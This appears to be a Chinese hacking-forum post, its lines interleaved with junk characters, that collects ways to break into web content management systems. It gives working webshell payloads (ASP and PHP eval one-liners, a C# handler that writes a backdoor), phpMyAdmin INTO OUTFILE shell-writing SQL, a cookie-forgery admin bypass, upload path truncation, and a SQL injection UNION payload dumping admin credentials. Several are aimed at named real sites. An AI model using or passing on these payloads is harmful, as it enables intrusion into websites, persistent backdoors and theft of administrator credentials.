<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
/ V/ g2 C( c; o& ?1 M# C3 xUpload a new file:<br>
* B3 ^% R* k) Q% r! O2 s<input type="file" name="NewFile" size="50"><br>
. Y, u' \# ?" J; O( o8 N<input id="btnUpload" type="submit" value="Upload">
# }( E5 {* ]; W3 s5 C6 V+ g5 _</form>. U3 D5 x' O% \+ O
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------; r& ~/ j& l9 y+ \9 \1 Z) d
$ ~0 n- D' h: u0 e- ISDcms 后台拿webshell
7 _, R4 V: H6 [& t) `+ X4 A; D# v+ @" d" o) k+ k
第一种方法: ~4 k- x3 w E$ H5 w# J; O9 ?
进入后台-->系统管理-->系统设置-->系统设置->网站名称;) B0 m5 T6 }5 p# w0 D) W4 U
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx9 _* \# ]9 h5 |. U' P/ `% {7 ?
用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。! c& P' d q. `! r. q* s! ^
第二种方法:
( e) d' Z! ~6 N- l# d$ @8 W进入后台-->系统管理-->系统设置-->系统设置->上传设置;- s+ t* m6 H& i" t) \3 E& X
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
m- P5 a5 L0 l9 E第三种方法:# Z( |$ |, t) S: x) c
进入后台-->界面管理-->模板文件管理-->创建文件
# @6 ^) d/ K5 S3 |3 T" m7 }+ {文件名写入getshell.ashx
. w% K4 Q+ |# B' b C {' U内容写入下面内容:
3 }0 Z$ X0 @8 |/====================复制下面的=========================/
C" S3 f3 J l/ _<%@ WebHandler Language="C#" Class="Handler" %>& `0 q! o7 h( r9 `/ o
using System;; I: k, G( V# ^& e5 c
using System.Web;
' a! [. P3 X O: X+ ?using System.IO;
: w1 S3 C( e. t/ I5 Z+ ^public class Handler : IHttpHandler {
2 s" C4 L# c6 m3 D2 F/ }$ a; Apublic void ProcessRequest (HttpContext context) {
$ P5 F# z3 B1 \! }+ k5 vcontext.Response.ContentType = "text/plain";
6 T* p1 a+ D7 v, |/ k S0 ~StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
! j$ e2 E) b# `% R. s: l; Hfile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
9 o3 X- Y0 K0 T/ \) z& ]file1.Flush();
2 z: _. J4 G/ ~# ~/ afile1.Close();+ ^/ F% ]% T( U: S$ `
}. D6 o2 z' c/ r* c' X2 h8 x6 K, \
public bool IsReusable {
+ J4 e& [2 G1 A; ?0 R8 |2 ]/ Bget {
! \% u2 B' Y3 i/ \, mreturn false;
9 a$ e* h/ F* t: J}' k" M$ l# F( |- h: j
}+ q3 |% j; G! h6 z
}7 e( l0 C4 Y: w+ O4 [
/=============================================/
6 [6 V5 V6 _1 W* [; o7 l) @访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx7 [" `1 M; Y" [3 F% k3 M
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
' @' u# A) O3 f-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% r) p4 F3 U2 m0 [6 X- g" J6 K6 i
4 n* `, p' ~6 k) VESCMS网站管理系统0day
' C4 o4 a" B: U
4 N4 Z- r# n. u" V6 {! ]后台登陆验证是通过admin/check.asp实现的# O! z9 p& j. G
7 D; H. |: X$ @- i0 d9 ^# ~
首先我们打开http://target.com/admin/es_index.html
c- W) q5 {5 u4 b然后在COOKIE结尾加上
) J" x. G7 h. V8 T; ESCMS$_SP2=ES_admin=st0p;/ ]# t% e. l- C6 \$ y* _! h
修改,然后刷新
3 R/ a+ V6 M8 G% B. z进后台了嘎..
$ M e' U0 U, e3 g/ V5 S9 j# X然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
* R" ~; f) ^) O- e* ~7 C) ]: {' Q7 [3 m& }. i1 ~4 {$ s4 F
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
( w/ M: ?. h) F, R3 z嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
$ k% V, @% P+ @0 z存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..* h, V3 B- E# I
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了% ]; `1 t$ L2 V5 L
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------' P- j! b: E6 U- j8 d
8 x5 z: b7 C9 C2 L4 ?8 n宁志网站管理系统后台无验证漏洞及修复
5 v- N A% S, U7 m7 ?/ y
2 R+ [& L8 m$ r5 L% a$ g2 E+ r% Y网上搜了一下,好像没有发布.如有雷同纯粹巧合!% R: G8 r; g. ?! Y( U% n, I* G
官方网站:www.ningzhi.net A2 S- \( z/ x& h+ r0 p( D
学校网站管理系统 V.2011版本 , ~& {; l0 M" t2 B% j! G
http://down.chinaz.com/soft/29943.htm
4 q+ ^6 S) ~. Y0 Y/ B; |其它版本(如:政府版等),自行下载.$ z$ ^3 S, O; e1 {
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~; U( q4 |1 p: Z8 M4 I+ T8 ^
login.asp代码如下:3 _8 F# E y. t( O9 o
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
% p, `' B, M6 b6 g0 S( Ymanage.asp代码我就不帖出来了.反正也没验证.
4 A- w+ P2 h" U, a' t; P9 f只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!. |& C- H9 G D
漏洞利用:8 o: U* l# W Q! Y9 l
直接访问http://www.0855.tv/admin/manage.asp
V8 F% q6 g! L! c* J; q! _数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web59 h5 H+ S" H0 g+ | u9 m4 r
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' k7 T8 d1 B8 P# s2 P, n9 e
6 ^# [& x3 _4 H/ B7 j, r, Zphpmyadmin拿shell的四种方法总结及修复
2 r! U& v% }$ u5 b, |0 L
) g9 e4 i" g8 V( M1 f" F/ D方法一:. \4 [) O' ^& l3 l `0 s
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
. L8 w6 V4 C. z1 ^8 O/ ]* G" ]- UINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
+ q) {9 T7 H( I( `2 fSELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';% k& O5 |" S; D" A. q# O3 {3 }) i
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php! e, T4 {5 Q9 s. G7 G ]
一句话连接密码:7on1 E# q8 v! r4 ~4 K5 T# f8 P
方法二:8 ~% x' \; H2 i* [+ M. ^+ |, E
读取文件内容: select load_file('E:/xamp/www/s.php');
/ q x/ A3 [7 {7 g6 }写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'3 g# q2 |. t) t9 f/ v8 a
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
# l1 Q* y% z! [) `% K6 y方法三:
3 F+ J, c8 h" r+ A. O& M/ r, rJhackJ版本 PHPmyadmin拿shell, h7 }+ n/ n* `/ F
Create TABLE study (cmd text NOT NULL);
8 o, g) |5 R. z/ e5 e. wInsert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');" v- Y" z3 A6 p
select cmd from study into outfile 'E:/wamp/www/7.php';3 k, h, f* k5 _, P* X1 ? t
Drop TABLE IF EXISTS study;
/ W1 @ }) F/ C# P- l/ ], Y; D<?php eval($_POST[cmd])?>
% T1 T0 w( m6 E MCREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。0 Y' a$ A, A% a( Q. U% A
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
% B! d3 q. }: w# zSELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
4 o1 d; q* U; b2 o* n, dDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。4 D3 j3 j# j; |% A' F
方法四:
+ K+ {1 k( N' q( s, tselect load_file('E:/xamp/www/study.php');
% _- o' E& Q; @& {$ L2 N8 G+ dselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
& R o+ i3 ]+ m1 i9 n% h1 |然后访问网站目录:http://www.2cto.com/study.php?cmd=dir* P; V1 |* d+ p& X/ Q
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
' T) Q# t7 S7 |
1 l3 W2 I2 e% u3 E) Y7 K0 jNO.001中学网站管理系统 Build 110628 注入漏洞
/ J# h* I/ W, x3 A3 n7 M6 B% y2 w) C8 l
# N! \4 n# o* o2 \' VNO.001中学网站管理系统功能模块:% I6 g2 l4 J, o, z$ Q8 R# I2 A
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
: J5 x; I' d5 `* X" p2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息6 T8 b( E9 J" `+ f- c
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息0 X1 k' M1 w3 K/ S5 P! R3 H
4.视频图片管理:一级分类,动态添加视频或者图片等信息) B9 q- H& W4 I b0 M7 H0 P0 N" F
5.留言管理:对留言,修改,删除、回复等管理
4 ]% ~4 {" p0 x" Y$ [/ E+ b6.校友频道:包括校友资料excel导出、管理等功能+ `& z7 d* B; c( p! U; T
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页$ d% M# [ c5 f0 V
默认后台:admin/login.asp, J6 v& d; r2 T* a; U# v4 s# l
官方演示:http://demo.001cms.net: `" f. e8 m8 z7 T0 D
源码下载地址:http://down.chinaz.com/soft/30187.htm
7 a9 B% T( r c' X) H7 b% rEXP:
# T9 J7 b* g" L( ]% Dunion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
+ I5 k, g7 z @" a, \+ a! y测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
2 L- N8 |9 e5 m, ^" { Ogetshell:后台有备份,你懂的
. B4 |% }8 _2 v- h5 Q; ^另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
9 ?8 D" c/ B' ~& L. V$ I8 {% d------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
匿名
发表于 2017-10-28 08:21:04
发表于 2012-9-13 16:58:38
收藏
支持
反对